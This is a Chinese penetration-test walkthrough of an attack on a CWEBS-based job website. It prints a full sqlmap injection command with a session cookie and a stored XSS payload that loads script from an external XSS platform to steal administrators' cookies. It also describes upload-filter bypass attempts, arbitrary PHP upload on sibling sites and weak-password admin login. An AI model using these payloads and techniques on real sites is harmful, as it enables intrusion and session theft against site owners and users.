作者:Liuker 原文: 转载必须注明。

0x1 前言:实在不知道要写什么文章了。现在的WEB渗透来来去去就那几种手法。所以就拿最近的一个项目写文章好了。

0x2
由于XX人才网被黑,所以找我们公司进行渗透测试。被黑了好几次 漏洞都补的差不多了  渗透难度较大

0x3

必要的信息收集

IP:XXX.XX.XX.X
端口:80
脚本:php
linux+IIS 9.0环境   这里大家应该会奇怪 linux+IIS 环境? 还是IIS9.0   其实很简单的  所谓的IIS9.0 就是apache 修改的

程序是CWEBS ,一套收费的程序

目标站点有用户注册,存在上传

0x4
扫描

工具扫描得到
敏感信息得到网站绝对路径等信息 不多写就摘取文章用到的信息
/home/web0906p1/htdocs/info.php
后台地址为
发现注入点
?ctl=Query&act=File&typeid=455
存在FCK编辑器
... nnectors/test.html#
旁站 58个同为Cwebs

0x6
检测存在的漏洞并且利用

在上传处发现上传目录以用户用户名为上传目录


/upfiles/Person//111.asp/40fe81afefd207b403e3c5acd3a0984c.jpg
非IIS 6.0 无果
试用burpsuite的payload尝试各种后缀唯独过滤PHP 。JSP无法执行

FCK编辑器修改成了白名单无果

注入漏洞利用如下
python "C:\Tools\sqlmapgui\sqlmap.py" -v 1 --beep --eta --batch -u "?ctl=Query&act=File&typeid=455" --level=3 --risk=2 --data="XM=1111&SFZ=1" --cookie="PHPSESSID=10f9b3c61c2cd1200a6fd28a37942221" --dbms=mysql --technique BEUST  --union-cols=1-10 --time-sec=5 --banner --current-user --current-db --is-dba --users --dbs

图1

1.jpg

前天 23:16 上传

下载附件 (46.25 KB)


然后注入一直提示403
目测NFS防火墙

然后接着看主站发现一个网上咨询
图2

2.jpg

前天 23:16 上传

下载附件 (39.36 KB)


然后发现存在XSS
插入代码
<script src="http://xssing.me/api1694"></script>于标题中
图3

3.jpg

前天 23:16 上传

下载附件 (31.3 KB)


然后等cookies

0x6

旁站都是cwebs

花了三个小时的时候看旁站


发现旁站又出网站意见反馈可以上传任意文件
图4

4.jpg

前天 23:16 上传

下载附件 (63.71 KB)


然后上传PHP文件得到地址

5.jpg

前天 23:16 上传

下载附件 (31.56 KB)


... 540e581f720a2a0.php
蛋疼了
直接下载不过我们可以判断00f3cf0b74840a2b3540e581f720a2a0.php为文件名
然后找到网站的一些文件的路径尝试无果
蛋疼鸟
不过管理也蛋疼了
在利用burpsuite 尝试组合弱口令
直接 1111 1111   (1111这个代表域名)
不过进入后台蛋疼了
很简单的后台